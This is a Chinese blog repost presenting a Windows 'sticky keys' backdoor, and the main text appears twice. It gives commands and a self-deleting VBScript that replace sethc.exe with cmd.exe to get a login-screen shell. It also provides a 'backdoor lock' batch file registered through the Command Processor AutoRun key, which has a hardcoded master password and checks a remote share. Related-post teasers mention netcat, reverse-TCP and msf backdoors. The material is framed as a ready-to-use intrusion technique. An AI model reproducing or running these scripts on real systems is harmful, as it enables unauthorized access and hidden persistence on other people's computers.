最酷的windows后门

转载 2007年10月15日 11:21:00

后门原理:

 转至:小章 blog http://blog.csdn.net/scz123/archive/2007/03/14/1528695.aspx

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%/system32/dllcache
ren sethc.exe *.ex~
cd %widnir%/system32
copy /y cmd.exe sethc.exe

VISTA:
takeown /f c:/windows/system32/sethc.exe
cacls c:/windows/system32/sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

后门扩展:

转至:7j blog http://1v1.name/show-241-1.html#cm300

再更新一下
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe", 0, True)
success = obj.run("cmd /c echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%/system32/sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True)

第二句最有意思了.嘿嘿..自运应答....以前就遇到过类似的问题

再更新.加个自删除,简化代码...
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe&echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F&copy %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe&copy %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe&del %SystemRoot%/system32/sethc.exe&ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

后门锁扩展:

allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 嘿嘿。。。

用下面的后门锁的方法是 把代码保存为bdlock.bat

然后修改注册表位置即可

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Command Processor]
"AutoRun"="bdlock.bat"

@Echo Off
title 后门登陆验证
color a
cls
set temprandom=%RANDOM%
echo 请输入验证码:%temprandom%
set/p check=
if "%check%"=="%temprandom%%temprandom%" goto passcheck
if "%check%"=="%temprandom%" (
rem 后门服务器验证
rem
 如果没有后门验证服务器请rem注释掉下一行代码
if exist /192.168.8.8/backdoor$/pass goto passcheck
)
echo 验证失败
pause
exit
:passcheck
echo 验证成功
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx
Set passcmdlock=http://blog.csdn.net/freexploit/
:allyesno
Set Errorlevel=>nul
Echo 请输入验证密码?
Set password=allyesno Is a pig>nul
Set/p password=
rem 万能密码
if "%password%"=="allyesno is a sb" goto endx
If %time:~1,1%==0 Set timechange=a
If %time:~1,1%==1 Set timechange=b
If %time:~1,1%==2 Set timechange=c
If %time:~1,1%==3 Set timechange=d
If %time:~1,1%==4 Set timechange=e
If %time:~1,1%==5 Set timechange=f
If %time:~1,1%==6 Set timechange=g
If %time:~1,1%==7 Set timechange=h
If %time:~1,1%==8 Set timechange=i
If %time:~1,1%==9 Set timechange=j
set/a sum=%time:~1,1%+%time:~1,1%
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul 
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End
Echo 请联系瑞星客服咨询正确密码!&Goto allyesno
:End
Set password=>nul
Set Errorlevel=>nul
Echo 很好,很和谐!
:endx

后门原理:

 转至:小章 blog http://blog.csdn.net/scz123/archive/2007/03/14/1528695.aspx

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%/system32/dllcache
ren sethc.exe *.ex~
cd %widnir%/system32
copy /y cmd.exe sethc.exe

VISTA:
takeown /f c:/windows/system32/sethc.exe
cacls c:/windows/system32/sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

后门扩展:

转至:7j blog http://1v1.name/show-241-1.html#cm300

再更新一下
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe", 0, True)
success = obj.run("cmd /c echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%/system32/sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True)

第二句最有意思了.嘿嘿..自运应答....以前就遇到过类似的问题

再更新.加个自删除,简化代码...
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe&echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F&copy %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe&copy %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe&del %SystemRoot%/system32/sethc.exe&ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

后门锁扩展:

allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 嘿嘿。。。

用下面的后门锁的方法是 把代码保存为bdlock.bat

然后修改注册表位置即可

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Command Processor]
"AutoRun"="bdlock.bat"

@Echo Off
title 后门登陆验证
color a
cls
set temprandom=%RANDOM%
echo 请输入验证码:%temprandom%
set/p check=
if "%check%"=="%temprandom%%temprandom%" goto passcheck
if "%check%"=="%temprandom%" (
rem 后门服务器验证
rem
 如果没有后门验证服务器请rem注释掉下一行代码
if exist /192.168.8.8/backdoor$/pass goto passcheck
)
echo 验证失败
pause
exit
:passcheck
echo 验证成功
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx
Set passcmdlock=http://blog.csdn.net/freexploit/
:allyesno
Set Errorlevel=>nul
Echo 请输入验证密码?
Set password=allyesno Is a pig>nul
Set/p password=
rem 万能密码
if "%password%"=="allyesno is a sb" goto endx
If %time:~1,1%==0 Set timechange=a
If %time:~1,1%==1 Set timechange=b
If %time:~1,1%==2 Set timechange=c
If %time:~1,1%==3 Set timechange=d
If %time:~1,1%==4 Set timechange=e
If %time:~1,1%==5 Set timechange=f
If %time:~1,1%==6 Set timechange=g
If %time:~1,1%==7 Set timechange=h
If %time:~1,1%==8 Set timechange=i
If %time:~1,1%==9 Set timechange=j
set/a sum=%time:~1,1%+%time:~1,1%
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul 
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End
Echo 请联系瑞星客服咨询正确密码!&Goto allyesno
:End
Set password=>nul
Set Errorlevel=>nul
Echo 很好,很和谐!
:endx
 

最酷的windows后门 呵呵

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe...
  • SysProgram
  • SysProgram
  • 2013年07月31日 12:01
  • 863

windows下后门技术(netcat篇)

由于这次ctf的失利,来补习一下知识吧!windows下后门环境 win7 nc.exe假设用administrator登陆用nc创建了一个后门,Netcat 功能比较单一, 缺少了许多我们渗透工作...
  • d_0xff
  • d_0xff
  • 2016年05月25日 23:47
  • 5416

一个Shift的后门程序,可以让你可以进入你不知道密码的电脑

1.前提 你可以在平时亲身接触状态电脑,哪怕是在电脑主人不在的时候(虽然主人不在,或者关机了,进入电脑是要密码的)。 2.原理 利用电脑连续按5次Shift会触发粘滞键,它会运行c:\winows\s...
  • yakson
  • yakson
  • 2013年08月01日 09:41
  • 18245

【技术分享】利用 Python 打造反向 TCP 后门

译者:shan66 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 Python的反向TCP后门 在Linux中,我们需要在一...
  • qq_27446553
  • qq_27446553
  • 2017年11月09日 17:39
  • 143

Python入门:python自制后门程序

应该场景:1、当目标服务器上有python环境(一般linux系统都会预安装) 2、目标服务器上不允许安装其它工具(因为要留后门或进一步攻击内容就需要上传各种工具)#python3.5 #Autho...
  • foryouslgme
  • foryouslgme
  • 2016年11月29日 22:02
  • 1041

代码简短且隐蔽的后门木马

本文将介绍一个代码很简短,而且很隐蔽的后门木马,以便让大家在检测程序时可以避免被挂木马。...
  • fdipzone
  • fdipzone
  • 2015年08月30日 22:16
  • 14789

利用WMI打造完美三无后门(scrcons.exe)

ASEC是WMI中的一个标准永久事件消费者。它的作用是当与其绑定的一个事件到达时,可以执行一段预先设定好的JS/VBS脚本...
  • QHH_QHH
  • QHH_QHH
  • 2015年10月16日 20:26
  • 4639

利用msf生成后门拿shell

kali  x64:192.168.26.136 win7  x86: 192.168.26.128 先在kali终端输入msfvenom -l,打开payload目录 ...
  • qq_36406396
  • qq_36406396
  • 2017年11月15日 23:20
  • 200

Android系统开发中添加系统后门键

Android系统开发中添加系统后门键       在我平常的开发中经常会遇到这样的情况出现,那就是需要进行系统升级来验证对系统层面的修改是否成功,一般的情况下都是通过串口工具输入命令来进行的。但是这...
  • tkwxty
  • tkwxty
  • 2015年02月10日 15:19
  • 1574

某ssh后门试用

在获取linux的root权限之后,虽然可以ssh连进去,但是可否长期进行控制呢?这里就涉及到ssh后门的问题了。在这里,我大致试用了一下一个比较老但是稳定的ssh后门,算是作个记录。后续我会翻译一篇...
  • bnxf00000
  • bnxf00000
  • 2015年04月23日 10:11
  • 1729
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:最酷的windows后门
举报原因:
原因补充:

(最多只允许输入30个字)